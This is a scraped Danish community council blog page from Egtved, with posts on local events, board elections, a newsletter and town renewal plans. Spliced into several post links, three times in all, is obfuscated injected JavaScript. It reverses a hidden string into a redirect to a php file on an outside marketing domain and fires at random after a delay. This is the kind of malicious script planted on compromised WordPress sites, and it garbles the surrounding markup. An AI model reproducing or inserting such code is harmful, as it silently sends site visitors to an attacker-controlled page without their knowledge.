Nytårskur

Egtved Udviklingsråd har i samarbejde med Egtved Bibliotek arrangeret en Nytårskur for alle foreninger i Egtved.

Du kan se invitationen her:

Nytårskur 2016 invitation

Udgivet i Egtvednet.dk | Skriv en kommentar

Det bedste ved Egtved

 

TAG ET BILLEDE AF DET BEDSTE ved EGTVED
Fotokonkurrence med gode præmier
Download folder:

Folder til fotokonkurrence 2015 (1)

 

Udgivet i Egtvednet.dk | Skriv en kommentar

Workshop om Roberthus

Roberthus forårHvordan får vi mere ud af Roberthus -  det gamle rådhus?

Det spørgsmål blev behandlet i en workshop, som bøde på forskellige forslag. Bl.a. udvikling af center for mikroturisme, et Robert Jacobsen-museum, et formidlingscenter for turisme i området – og meget mere. Fælles for alle arbejdsgrupper var ønsket om at en fast person blev tilknyttet og at der blev en café, som kunne bruges til møder og konferencer. Se et fyldigt referat under Planer/Projekter

 

Udgivet i Egtvednet.dk | Skriv en kommentar

Konstituering på plads

På det konstituerende møde i Egtved Udviklingsråd blev Inger Pabst genvalgt som formand. Hardy Stagelund Nielsen (AktivErhverv) blev valgt til næstformand. Flemming Tangsgård Nielsen fortsætter som kasserer, Helle Wiese fortsætter som sekretær. Endvidere blev Henrik Sandholm udpeget til at være ansvarlig for hjemmeside og Facebook.
Øvrige medlemmer af Egtved Udviklingsråd er Allan Andersen (Egtved Idrætsforening) og Kirsten Jensen (Egtved Skole). Suppleanter er Edvard Simonsen (Egtved Handelsforening), Christina Runge (Egtved Handelsforening) og Mette Lyager.

Udgivet i Egtvednet.dk | Skriv en kommentar

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[/" title="Permalink til Generalforsamling i Egtved Udviklingsråd – se form$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andens beretning" rel="bookmark">Generalforsamling i Egtved Udviklingsråd – se formandens beretning

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andsberetning-2014.docx">Formandsberetning 2014

Generalforsamling 2015 referat

 

Udgivet i Egtvednet.dk | $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[/#respond" title="Kommentar til Generalforsamling i Egtved Udviklingsråd – se form$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andens beretning">Skriv en kommentar

Nyhedsbrev Marts 2015

Årsmødet den 24. martskl. 19.00 – har fokus på Egtvedpigen. Egtved Udviklingsråd har gennem flere år forsøgt at skærpe Vejle Kommunes fokus på Egtvedpigen og måden hun præsenteres på i Egtved. -  Og måske er der handling på vej.
 Historien om Egtvedpigen har et stort potentiale som mål for turister og der ser ud til at være håb om, at den historie kan blive fortalt i mere tidsvarende rammer indenfor en overskuelig fremtid. Det kan man høre mere om på årsmødet i Roberthus, hvor både formanden for Kultur- og Fritidsudvalget Dan Arnløv Jørgensen og museumschef Ove
Sørensen vil være til stede.
Efter årsmøde er der ordinær generalforsamling ifølge vedtægterne, som kan ses på www.egtvedudviklingsraad.dk

Kultur, natur og turisme set som en samlet helhed er et oplagt udviklingsområde for Egtved. Mange borgere er enige om, at Egtved og omegn har et store og uudnyttede muligheder som mål for turister, som søger oplevelser udenfor de meget kommercielle turistcentre.  Nogle af disse borgere har taget fat på at finde ud af, hvordan der kan arbejdes med at gøre Egtved kendt som turistmål – og hvem der vil være centrale samarbejdspartnere.  Det er planen at invitere til information om arbejdet i april måned, så flere kan inddrages.  Egtved Udviklingsråd er med i arbejdet og så snart et forslag er klar, vil det blive offentliggjort på Udviklingsrådets hjemmeside. 

Roberthus – hvordan skal huset udvikle sig i fremtiden? Det spørgsmål har Udviklingsrådet flere gange stillet Vejle Kommune og der er nu lagt op til, at borgerne får mulighed for at komme med input og forslag.  Der vil blive afholdt en workshop d. 8. april kl. 16 – 20  hvor borgerne kan bidrage og hvor medarbejdere fra Vejle Kommune vil samle op på forslag og gå videre med dem. Efterfølgende vil de forskellige forvaltninger give tilbagemeldinger til deltagerne i workshoppen om, hvilke forslag der kan arbejdes videre med. Der vil være tilmelding til workshoppen af hensyn til forplejningen.

Skal Egtved have en ”Gadebande”? Det lyder jo mærkeligt – men i denne sammenhæng er en ”Gadebande” en gruppe af borgere, som vil se på Egtveds gader, veje, stier, fortove, pladser mm med kritiske øjne og indgå i et samarbejde med Vejle Kommunes tekniske forvaltning om at prioritere vedligeholdelsen i Egtved:  Hvad skal ordnes ? – I hvilken rækkefølge?
Egtved Udviklingsråd prøver at samle en gruppe med repræsentanter for forskellige dele af byen, så alle områder kan blive dækket. ”Gadebanden” rådgiver – Vejle Kommune udfører – sådan bliver arbejdsdelingen.

Forskønnelsespris til Egtveds bedst vedligeholdte hus. Måske har I set, at I kan være med til at støtte Udviklingsrådets pris via de røde plastikmønter i Superbrugsen?
 Udviklingsrådet søger konstant at få penge til byfornyelse og udvikling af Egtved. Men der er også mange borgere som aktivt er med til at forskønne byen ved at sørge for fin udvendig vedligeholdelse af huse, haver, fortove – til glæde for folk som kommer forbi. Derfor vil Udviklingsrådet opfordre alle til at støtte projektet og til at foreslå hvilke huse/ejendomme i Egtved der bør komme i betragtning, når en vinder skal udpeges. Prisen præsenteres på årsmødet –  Se mere på hjemmesiden og facebook.

Områdefornyelsen i Midtbyen: Vejle Kommune er gået i gang med at projektere Vestergade, der får cykelstier og fartdæmpere ligesom i Søndergade. Selve arbejdet begynder efter sommerferien.
 Arbejdet med det grønne område sinkes af, at der skal findes løsninger på de våde områder. Der skal måske laves ny lokalplan, hvilket vil forsinke processen yderligere.

 

Udgivet i Egtvednet.dk | Skriv en kommentar

Årsmøde i Egtvedpigens tegn

Egtved Udviklingsråd

Årsmøde og generalforsamling i Roberthus Tirsdag den 24. marts kl. 19.00

Årsmødets tema er:

Egtvedpigen – natur, kultur og turisme

Mød Formand for Kultur- og Idrætsudvalget Dan Arnløv Jørgensen, Museumschef Ove Sørensen og arkæolog Louise Felding. Efter årsmødets oplæg og en kort kaffepause afholdes generalforsamling. Vedtægterne kan ses på www.egtvedudviklingsraad.dk Alle er velkomne.

Udgivet i Egtvednet.dk | Skriv en kommentar

Egtved Udviklingsråd ønsker Glædelig Jul og Godt Nytår

Egtved Udviklingsråd fortsætter i 2015 arbejdet med at fastholde en positiv udvikling for byen – også i det nye år: Det grønne område i Egtved Ådal bliver klar til brug – Den nye parkeringsplads ved forsamlingshuset tages i brug – Der skal afsættes penge på Vejle Kommunes budget til bedre faciliteter ved Egtvedpigens Grav  - Der skal fortsat arbejdes for kommunale udstykninger i Egtved og så skal de, der arbejder på at forskønne byen med fin vedligeholdelse af deres ejendomme, belønnes med en pris som Udviklingsrådet vil uddele. Sæt kryds i kalenderen ved den 24. marts: Egtved Udviklingsråds årsmøde og generalforsamling, hvor temaet vil være Egtvedpigen.  Besøg udviklingsrådets hjemme side eller facebook og følg med. www.egtvedudviklingsraad.dk og facebook.com/EgtvedUdviklingsråd. Egtved Udviklingsråd ønsker alle Egtvedborgere en Glædelig Jul og et Godt Udviklings-Nytår

Udgivet i Egtvednet.dk | Skriv en kommentar

Planerne for Egtved Midtby

 

Se de foreløbige planer og følg udviklingen. Planerne for Egtved Ådal er endnu ikke helt på plads – der mangler enkelte tekniske løsninger vedrørende vandløb m.v..

Udgivet i Egtvednet.dk | Skriv en kommentar

Hvad sker der i Midtbyprojektet?

Det er synligt, at arbejdet med at give tryg plads for cyklister i Søndergade er godt i gang.
Der arbejdes også i gruppen som planlægger hvad de grønne arealer på “gartnerigrunden” skal bruges til. Se referatet fra sidste møde under Planer/projekter.

Udgivet i Egtvednet.dk | Skriv en kommentar